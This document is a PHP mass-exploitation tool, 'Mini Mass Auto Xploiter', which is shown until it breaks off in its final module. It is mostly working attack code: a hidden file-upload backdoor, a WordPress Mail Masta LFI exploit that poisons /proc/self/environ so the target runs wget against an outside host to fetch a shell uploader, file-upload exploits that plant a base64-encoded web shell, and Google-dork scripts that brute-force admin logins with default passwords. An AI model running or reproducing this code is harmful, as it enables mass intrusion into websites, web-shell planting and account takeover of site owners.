Mini Mass Auto Xploiter Only Tools v1.0

<!DOCTYPE html><html><head><meta charset="UTF-8">
<title>Mini Mass Auto Xploiter Only Tools v1.0</title>
<?php
/// This is Juste a [Zip] Off Tools Don't Change Right Noob

/// Mass Auto Xploiter Only Tools v1.014 Tool
/// Created By Mister Klio
/// Mail  : [email protected]
/// Fb : www.fb.com/IzzAdiine

?>
<style>
@import url(https://fonts.googleapis.com/css?family=Berlin%20Sans%20FB);
body {
font-family: 'Berlin Sans FB', Arial, sans-serif;
background: #383838;color: white;
font-size:15px;}span {color: #404040;font-size:15px;
}
span,b,font,a {
font-size:15px;
}
.header-izz {
-webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
margin: 20px 0;
background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));
background:-webkit-linear-gradient(top, #505050, #383838);
background:linear-gradient(to bottom, #505050, #383838);
background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;
width: 400px;position: relative;border-radius: 20px;padding: 20px;color: white;
}
.button {
background: #0078FF;  color: white;  text-align: center;  padding: 12px;  text-decoration: none;
border-radius: 1px;  border-radius:5px;margin:0 auto;  border:1px solid #4D4D4D;
}
input {margin: 0;
-webkit-box-sizing: border-box;width:90%;
}
.checkout-input {
font-family: 'Berlin Sans FB', Arial, sans-serif;
margin: 0;
padding:2px;
height: 32px;
width:90%;
color: #FFFFFF;
background: #383838;
border :0px;
border-radius:5px;
-webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
}

a  {text-decoration:none; font-family: 'Berlin Sans FB', Arial, sans-serif;color:#FFFFFF;}
a:hover {text-decoration:none;color:#fffffff;background:#0078FF;
}
.Izz {
	background: #0078FF;
	border-radius: 20px;
	padding: 10px;
}
</style>
<?
/// Hide Really File Upload
if ($_GET['Hide'] == 'Upload') {
echo "<center><a Style='font-size:30px;'><br>
Upload Files </a></center><center><center><form method='post' enctype='multipart/form-data' >
<input type='file' name='idx'><input type='submit' name='upload' value='upload' class='button'>
</form>";
if($_POST['upload']) {
	if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
	echo "Done!";
	} else {
	echo "Sorry Mama No  !";
	}
}
exit;
}
?>
<center>
<?php
//// Thsi Script Juste For Fun :v
echo "<center><form action=' ' method='post' enctype='multipart/form-data' >
<input type='file' ><input type='submit' name='Done' value='upload' class='button'>
</form>";
$Done = $_POST ['Done'];
if ($Done){
echo '<br> Fuck You Noob Are  You A Really Hacker ??? Fuck  Kill me<br>';
}
?></center>
<br><center><a Style='font-size:30px;'>Mass Auto Xploiter  Only Tools v1.0</b></center>
<center><a Style='font-size:15px;'>Created By Mister Klio [MK] </a></center>
<center><a Style='font-size:15px;'>www.Facebook.com/MrKlio </a></center>
<? echo "".php_uname()."<br>"; ?>
<center><a Style='font-size:15px;'>Copyright 2017 All Right Reserved </a></center>
<?
//// Mister  klio Only Tools v1.0
?>
<br><br>
<center>
<a class='Izz'  href='?Home=Done!'  style='background:#2270ff;'>Home (Hide My Tools)</a>
<a class='Izz'  href='?Scanexploit=Done!'  style='background:#2270ff;'>Cms Scanner Vuln  Online</a>
<a class='Izz'  href='?Aksidownload=Done!'  style='background:#2270ff;'>Auto Dorker Auto Upload Shell (Aksi download)</a>
<a class='Izz'  href='?adminweb=Done!'  style='background:#2270ff;'>Admin Auto Get Login  (Ajax Google Dorker)</a>
<? //////  ?><br><br><br>
<a class='Izz'  href='?Udesign=Done!'  style='background:#2270ff;'>Wp Theme U-design (Uploadify</a>
<a class='Izz'  href='?single-upload=Done!'  style='background:#2270ff;'>Wp Plugins tevolution (Single Upload)</a>
<a class='Izz'  href='?Upload=Done!'  style='background:#2270ff;'>Xploit Upload Files (All Url Vuln)</a>
<a class='Izz'  href='?uploadimages=Done!'  style='background:#2270ff;'>Modules Upload Files (uploadimages)</a>
<? //////  ?><br><br><br>
<a class='Izz'  href='?download=Done!'  style='background:#2270ff;'>Wp Auto Get Db (LFI) </a>
<a class='Izz'  href='?forcedownload=Done!'  style='background:#2270ff;'>WP Get Database [Forcedownload]</a>
<a class='Izz' href='?mail-masta=Done!'  style='background:#2270ff;'> 1 - Wordpress Auto Get DataBase (AFD)</a>
<a class='Izz' href='?PluginMail=Done!'  style='background:#2270ff;'> 2 - WordPress Plugin  Mailmasta (LFI)</a>
<? //////  ?><br><br><br>
<a class='Izz'  href='?jqueryDownload=Done!' style='background:#2270ff;'>Jquery File Upload (uploader )</a>
<a class='Izz'  href='?CatproManage=Done!' style='background:#2270ff;'>Wordpress Catpro Gallery (AFU)</a>
<a class='Izz'  href='?Finder=Done!' style='background:#2270ff;'>Finder Admin V2.0</a>
<? //////  ?>

<? //////  ?><br><br>

<?php
if ($_GET['Scanexploit'] == 'Done!') {
?>
<?php

@set_time_limit(0);
@error_reporting(0);

// Script Functions , start ..!

function ask_exploit_db($component){

$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";

$result = @file_get_contents($exploitdb);

if (eregi("No results",$result))  {

echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";

}else{

echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";

}
}

/**************************************************************/
/* Joomla Conf */

function get_components($site){

$source = @file_get_contents($site);

preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $comm){

echo "<tr><td>$comm</td>";

ask_exploit_db($comm);

}

}

/**************************************************************/
/* WP Conf */

function get_plugins($site){

$source = @file_get_contents($site);

preg_match_all("#/plugins/(.*?)/#i", $source, $f);

$plugins=array_unique($f[1]);

if(count($plugins)==0){ echo "<tr><td colspan=1>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach($plugins as $plugin){

echo "<tr><td>$plugin</td>";

ask_exploit_db($plugin);

}

}

/**************************************************************/
/* Nuke's Conf */

function get_numod($site){

$source = @file_get_contents($site);

preg_match_all('{?name=(.*?)/}i',$source,$f);
preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
preg_match_all('{/modules/(.*?)/}i',$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $nmod){

echo "<tr><td>$nmod</td>";

ask_exploit_db($nmod);

}

}

/*****************************************************/
/* Xoops Conf */

function get_xoomod($site){

$source = @file_get_contents($site);

preg_match_all('{/modules/(.*?)/}i',$source,$f);

$arz=array_merge($f[1]);

$coms=array();

if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $xmod){

echo "<tr><td>$xmod</td>";

ask_exploit_db($xmod);

}

}

/**************************************************************/
 /* Header */
function t_header($site){

?>

<?
echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';

echo'
<tr>
<td>Site : <a href="'.$site.'">'.$site.'</a></td>
<td>Exploit-db</b></td>
<td>Exploit it !</td>
</tr>
';

}

?>
<center><a Style='font-size:30px;'><br>
Cms Scanner Vuln  Online</a></center><center>
<br>
<form method="POST" action=""  class='header-izz'>
	<p align="center"><input type="text" name="site" value="http://www.target.mu/" class='checkout-input'>
	<br><br>
	<select  name="what">
	<option>Wordpress</option>
	<option>Joomla</option>
	<option>Nuke's</option>
	<option>Xoops</option>

	</select><br><br><input type="submit" value="Get Xploit" class='button'></p>
</form>
<?

// Start Scan :P :P ...

if($_POST){

$site=strip_tags(trim($_POST['site']));

t_header($site);

echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";

}
exit;
}
?>
</table>
<?php
if ($_GET['PluginMail'] == 'Done!') {
?>
<br><center><a Style='font-size:30px;'>
WordPress Plugin  Mailmasta (LFI)</a></center><center>
<br>
Dork :  /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
Dork :  /plugins/mail-masta/inc/campaign/ <br>
	<form method='post' class='header-izz'>
Target:<br><br> <input type="text" size="60" name="lfiurl" value="http://target.com" style='width: 350px;' class='checkout-input'> <br><br>
<input type="submit" value="Done!" class='button'>
</form>
<?php
if($_POST['lfiurl']) {
print "<pre>";
$target = $_POST['lfiurl'];
$testlfi = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd%00";
$readenv = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/proc/self/environ%00";
$mbooh = preg_split("/.php/", $target);
$pecah = preg_split("/\//", $mbooh[0]);
$path = "/";
$azz = count($pecah) - 1;
for($g = 3; $g<$azz;$g++) {
$path.= $pecah[$g]."/";
}
$bug = $pecah[$azz].".php".$mbooh[1];
$host = $pecah[2];
print "[+] Testing LFI ... ";
flush();
$res = FetchURL($target.$testlfi);
if(preg_match("/root:x:0:0/", $res)) {
print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
flush();
$rez = FetchURL($target.$readenv);
if(preg_match("/DOCUMENT_ROOT=/", $rez)) {
print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
flush();
$cmd = "<?php system('wget -O up.php www.wget.yu.tl/files/uploader.css');?>";
$soket = fsockopen($host, 80);
$req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
fputs($soket, $req);
fclose($soket);
flush();
$cek = FetchURL("http://".$host.$path."up.php");
if(preg_match("#SilverHood#i", $cek)) {
print "[+] Exploit successful!<br>[+] Shell uploader to <font color='green'>http://".$host.$path."up.php</font>";
} else {
print "<font color='red'>[!] Exploit failed!</font><br>";
}
}
else {
print "<font color='red'>Failed</font><br>";
}
} else {
print "<font color='red'>Failed</font><br>";
}
}
function FetchURL($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if(!$data) {
return false;
}
return $data;
}
exit;
}
?>
<?
if ($_GET['CatproManage'] == 'Done!') {
 ?>
<?php
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@set_time_limit(0);
/*
Name app : Wordpress Catpro Gallery (AFU)
Author / Editor Script : MKs CYBERSERKERS
Email : [email protected]
*/

?><br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Catpro Gallery (AFU)</a></center><center>
Dork : /wp-admin/admin.php?page=catpro_manage <br>
	<form method='post' class='header-izz'>
	Domain: <br>Mk.php.xxxjpg<br><br>
	<textarea placeholder='http://www.target.com/' name='url' style='width: 350px;' class='checkout-input'></textarea><br><br>
	<input type='submit' name='MK' value='Done!' class='button'>
	</form>

	<?php
	$site = $_POST['url'];
if($_POST['MK']) {
echo "<br> Target : ".$site."<br>";
$post = array(
"task" => "cpr_add_new_album",
"album_name" => "MKs",
"album_desc" => "MKs",
"album_img" => "@Mk.php.xxxjpg",
);
$ch = curl_init ("$site/wp-admin/admin.php?page=catpro_manage");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
}
exit;
}
?>
<?
if ($_GET['jqueryDownload'] == 'Done!') {
 ?>
<br><center><a Style='font-size:30px;color:#ededed;'>Jquery File Upload (uploader )</a></center><center>
Dork : /assets/global/plugins/jquery-file-upload/server/php/ <br>
<form method="post" action="" enctype="multipart/form-data"  class='header-izz'>
Name Shell Upload : <br><br><input type="text" name="go" value="Mk.php.xxxjpg"  style='width: 350px;' class='checkout-input'><br><br>
Target :<br><br>
<textarea placeholder="http://www.target.com/"  name="sites" style='width: 350px;' class='checkout-input'></textarea><br><br>
<input type="submit" name="go" value="Xploit!" class='button'>
</form>
<?php
$site = explode("\r\n", $_POST['sites']);
$go = $_POST['go'];
if($go) {
foreach($site as $sites) {

$uploader = 'Mk.php.xxxjpg';

$ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('files[]'=>"@$uploader"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
preg_match('/"url":"(.*?)"/', $postResult, $get);
$loc = $get[1];
echo "URL : <font color=green>$sites</font><br>";
echo "Status : Successfully Xploited!<br>";
echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
}else {
	echo 'Not Upload';
}
}
}
exit;
}
?>
<?
if ($_GET['Aksidownload'] == 'Done!') {
 ?>
<br><center><a Style='font-size:30px;color:#ededed;'>Auto Dorker Auto Upload Shell (Aksi download)</a></center><center>
Dork : /adminweb/modul/mod_download/aksi_download.php <br>
<form method="post" class='header-izz'>
<form method="post">
Dork: <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
<input type="submit" value="scan" class='button'>
</form>
<?php

class MK {
	public $dork;
	public function google($dork, $page) {
		$kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
		$dork = urlencode($dork);
    	$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
    	$output = json_decode($this->http_getx($url, true), true);
    	if($output) {
    		return $output;
    	} else {
    		return false;
    	}
	}
	public function http_getx($url, $safemode = false) {
		if($safemode === true) sleep(1);
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close();
	}
	public function buffer() {
		ob_flush();
		flush();
	}
	public function exploit($url,$payload) {
		$ch = curl_init($url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    	$res = curl_exec($ch);
          curl_close($ch);
    	return $res;
	}
}
$dorker = new MK;
$dork = $dorker->dork = $_POST['dork'];
if(isset($dork)) {
	$data = $dorker->google($dork, "0");
	$dorker->buffer();
	if($data) {
		foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
			$data = $dorker->google($dork, $data_page['start']);
			foreach($data['responseData']['results'] as $key => $load_data) {
				if($_SESSION[$load_data['visibleUrl']]) {
				} else {
					$_SESSION[$load_data['visibleUrl']] = "1";
					$url = "http://".$load_data['visibleUrl']."/";
					$up = array(
        				"admin" => "admin",
        				"admin" => "123456",
        				"admin" => "admin123456",
        				"admin" => "tolol",
        				"admin" => "administrator",
        				"MK" => "MK",
        				);
					foreach($up as $user => $pass) {
						$data1 = array("username" => $user, "password" => $pass,);
						$anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data1);
						if(preg_match("/Logout|Administrator/i", $anu)) {
							$file = "shellmu.php"; // ubah shellmu.php jadi nama file shellmu 1 dir dengan exploit ini
							$data2 = array("judul" => "MK", "fupload" => "@$file", "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;");
							$anu2 = $dorker->exploit($url.'/adminweb/modul/mod_download/aksi_download.php?module=download&act=input', $data2);
							if(preg_match("/MK/", $anu2)) {
								$cek = $dorker->http_getx("$url/files/shellmu.php");
								if(preg_match("/Upload|MySQL|SMTP Grabber/i", $cek)) {
									echo "<a href='$url/files/shellmu.php' target='_blank'>$url/files/shellmu.php</a><br>";
								}
							}
						}
					}
				$dorker->buffer();
				}
			}
		}
	$dorker->buffer();
	} else {
		echo "google captcha.";
	}
}
exit;
}
?>
<?
if ($_GET['adminweb'] == 'Done!') {
 ?>
<br><center><a Style='font-size:30px;color:#ededed;'>Admin Auto Get Login  (Ajax Google Dorker)</a></center><center>
Dork : inurl:/semua-berita.html <br>
<form method="post" class='header-izz'>
Dork : <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
<input type="submit" value="scan" class='button'>
</form>
<?php
class MK {
	public $dork;
	public function google($dork, $page) {
		$kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
		$dork = urlencode($dork);
    	$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
    	$output = json_decode($this->http_getx($url, true), true);
    	if($output) {
    		return $output;
    	} else {
    		return false;
    	}
	}
	public function http_getx($url, $safemode = false) {
		if($safemode === true) sleep(1);
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close();
	}
	public function buffer() {
		ob_flush();
		flush();
	}
	public function exploit($url,$payload) {
		$ch = curl_init($url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    	$res = curl_exec($ch);
          curl_close($ch);
    	return $res;
	}
}
$dorker = new MK;
$dork = $dorker->dork = $_POST['dork'];
if(isset($dork)) {
	$data = $dorker->google($dork, "0");
	$dorker->buffer();
	if($data) {
		foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
			$data = $dorker->google($dork, $data_page['start']);
			foreach($data['responseData']['results'] as $key => $load_data) {
				if($_SESSION[$load_data['visibleUrl']]) {
				} else {
					$_SESSION[$load_data['visibleUrl']] = "1";
					$url = "http://".$load_data['visibleUrl']."/";
					$up = array(
        				"admin" => "admin",
        				"MK" => "MK",
        				"admin" => "123456",
        				"admin" => "admin123456",
        				"admin" => "tolol",
        				"admin" => "administrator",
        				);
					foreach($up as $user => $pass) {
						if($_SESSION[$user] && $_SESSION[$pass]) {
						} else {
							$_SESSION[$user] = "1";
							$_SESSION[$pass] = "1";
							$data = array(
								"username" => $user,
								"password" => $pass,
								"Submt" => "Submit",
								);
							$anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data);
							if(preg_match("/Logout|Selamat Datang di Halaman Administrator/i", $anu)) {
								echo "<a href='$url/adminweb/' target='_blank'>$url</a> -> sukses login [$user:$pass]<br>";
							} else {
								echo "$url -> gagal login.<br>";
							}
						}
					$dorker->buffer();
					}
				}
			}
		}
	$dorker->buffer();
	} else {
		echo "google captcha.";
	}
}
exit;
}
?>
<?
if ($_GET['Udesign'] == 'Done!') {
 ?>
<br><center><a Style='font-size:30px;color:#ededed;'> Wp Theme U-design (Uploadify)</a></center><center>
Dork : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php <br>
<center>
<form method="post" enctype="multipart/form-data" class='header-izz'>
Shellname : <br><br><input type="text" name='filename'  value='Mk.php.xxxjpg'  style='width: 350px; height:20px;' class='checkout-input'><br>
Target: <br><br><textarea name="url"  placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
<input type='submit' name='exp' value='Done!' class='button'>
</form>
<?php

set_time_limit(0);
error_reporting(0);

function buffer() {
	ob_flush();
	flush();
}
function curl($url, $payload) {
	$ch = curl_init();
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		  curl_setopt($ch, CURLOPT_URL, $url);
		  curl_setopt($ch, CURLOPT_POST, true);
		  curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
		  curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		  curl_setopt($ch, CURLOPT_HEADER, 0);
		  curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	$res = curl_exec($ch);
		  curl_close($ch);
	return $res;
}
function cek($url) {
	$ch = curl_init();
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		  curl_setopt($ch, CURLOPT_URL, $url);
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	$res = curl_exec($ch);
		  curl_close($ch);
	return $res;
}
$file = htmlspecialchars($_POST['filename']);
$site = explode("\r\n", $_POST['url']);
$do = $_POST['exp'];
$uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if($do) {
	$idx_dir = mkdir("Mk_only", 0755);
	$shell = "Mk_only/".$file;
	$fopen = fopen($shell, "w");
	fwrite($fopen, $uploader);
	fclose($fopen);
	foreach($site as $url) {
		$target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
		$data = array(
			"Filedata" => "@$shell"
			);
		$curl = curl($target, $data);
		if($curl) {
			$cek = cek($url.'/'.$file);
			if(preg_match("/MK/i", $cek)) {
				echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
			}
		}
	buffer();
	}
}
exit;
}
?>
<?
if ($_GET['single-upload'] == 'Done!') {
?>
<br><center><a Style='font-size:30px;color:#ededed;'> Wp Plugins tevolution (Single Upload)</a></center><center>
Dork : /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php <br>
<center>
<form method="post" enctype="multipart/form-data" class='header-izz'>
Shellname Mk.php.xxxjpg : <br><br><input type="text" name='filename'  value='Mk.php.xxxjpg' required style='width: 350px; height:20px;' class='checkout-input'><br>
Target: <br><br><textarea name="url"  placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
<input type='submit' name='exp' value='Upload' class='button'>
</form>
<?php
// IndoXploit
set_time_limit(0);
error_reporting(0);

function buffer() {
	ob_flush();
	flush();
}
function curl($url, $payload) {
	$ch = curl_init();
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		  curl_setopt($ch, CURLOPT_URL, $url);
		  curl_setopt($ch, CURLOPT_POST, true);
		  curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
		  curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		  curl_setopt($ch, CURLOPT_HEADER, 0);
		  curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	$res = curl_exec($ch);
		  curl_close($ch);
	return $res;
}
$file = htmlspecialchars($_POST['filename']);
$site = explode("\r\n", $_POST['url']);
$do = $_POST['exp'];
$uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if($do) {
	$y = date("Y");
	$m = date("m");
	$idx_dir = mkdir("Mk_only", 0755);
	$shell = "Mk_only/".$file;
	$fopen = fopen($shell, "w");
	fwrite($fopen, $uploader);
	fclose($fopen);
	foreach($site as $url) {
		$target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/uploadfile.php';
		$cek_shell = "$url/wp-content/uploads/$y/$m/$file";
		$data = array(
			"Filedata" => "@$shell"
			);
		$curl = curl($target, $data);
		if($curl) {
			$cek = file_get_contents($cek_shell);
			if(preg_match("/Auto Xploiter/is", $cek)) {
				echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
			}
		}
	buffer();
	}
}
exit;
}
?>
<?php
if ($_GET['uploadimages'] == 'Done!') {
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@set_time_limit(0);

echo"<br><center><a Style='font-size:30px;color:#ededed;'> Modules Upload Files (uploadimages)</a></center><center>
<br>
/uploadimages.php<br>
Dork : /modules/simpleslideshow/<br>
Dork : /modules/productpageadverts/<br>
Dork : /modules/homepageadvertise/<br>
Dork : /modules/columnadverts/<br>

<form  method='post'  class='header-izz'>
	Domain: <br><br>
	<textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
	<input type='submit' name='MK' value='Done!' class='button'>
	</form><br>";
	if($_POST['MK']) {
$site = $_POST['url'];
$file = "mk.html";
echo "<br>Target : ".$site."<br>";
$expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
foreach($expl as $exploit){
$post = array("userfile" => "@$file",
);
$MK = $site.$exploit."/uploadimages.php";
$ch2 = curl_init ($MK);
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
$Gets = $site.$exploit."/file_uploads/".$file;
$MKget = @file_get_contents($Gets);
